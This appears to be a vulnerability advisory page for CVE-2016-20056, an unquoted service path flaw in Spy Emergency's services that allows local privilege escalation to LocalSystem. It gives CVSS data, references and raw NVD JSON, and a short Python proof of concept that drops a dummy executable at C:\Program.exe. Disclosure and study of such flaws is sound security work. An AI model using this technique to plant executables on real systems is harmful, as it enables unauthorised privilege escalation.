CVE-2016-20056

Description

Spy Emergency build 23.0.205 contains an unquoted service path vulnerability in the SpyEmrgHealth and SpyEmrgSrv services that allows local attackers to escalate privileges by inserting malicious executables. Attackers can place executable files in the unquoted service path and trigger service restart or system reboot to execute code with LocalSystem privileges.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Spy Emergency build 23.0.205

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
import sys

# Proof of Concept for Unquoted Service Path Vulnerability
# This script simulates placing a malicious executable in a vulnerable path.

def create_malicious_exe(target_path):
    """
    Creates a dummy executable at the target path.
    In a real attack scenario, this would be a payload.
    """
    # Minimal PE header (MZ signature)
    pe_header = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    
    try:
        print(f"[*] Attempting to write to {target_path}")
        with open(target_path, "wb") as f:
            f.write(pe_header)
        print(f"[+] Success! Malicious file created at: {target_path}")
        print("[*] Wait for the service to restart or for a system reboot to trigger the payload.")
    except PermissionError:
        print("[-] Error: Insufficient permissions to write to the target path.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example target based on common unquoted path vulnerabilities (e.g., C:\Program.exe)
    # The attacker would determine the exact path by querying the service configuration first.
    target = "C:\\Program.exe"
    create_malicious_exe(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20056
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20056
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20056/
[4] VulDB https://vuldb.com/cve/CVE-2016-20056
[5] http://www.spy-emergency.com/
[6] http://www.spy-emergency.com/download/download.php?id=1
[7] https://www.exploit-db.com/exploits/40550
[8] https://www.vulncheck.com/advisories/spy-emergency-build-unquoted-service-path-privilege-escalation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20056", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:18.057", "lastModified": "2026-04-16T16:15:56.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spy Emergency build 23.0.205 contains an unquoted service path vulnerability in the SpyEmrgHealth and SpyEmrgSrv services that allows local attackers to escalate privileges by inserting malicious executables. Attackers can place executable files in the unquoted service path and trigger service restart or system reboot to execute code with LocalSystem privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "http://www.spy-emergency.com/", "source": "[email protected]"}, {"url": "http://www.spy-emergency.com/download/download.php?id=1", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40550", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/spy-emergency-build-unquoted-service-path-privilege-escalation", "source": "[email protected]"}]}}